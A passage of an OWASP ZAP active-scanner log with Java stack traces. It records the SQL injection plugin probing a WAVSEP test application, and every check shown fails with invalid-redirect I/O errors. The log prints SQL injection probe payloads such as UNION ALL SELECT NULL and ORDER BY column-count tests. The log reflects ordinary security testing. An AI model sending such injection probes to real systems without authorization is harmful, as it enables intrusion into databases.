org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679553 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679554 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679554 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679555 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679556 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 3703#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 3703# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679557 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679558 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679558 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679559 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679560 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679560 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679561 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679562 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect 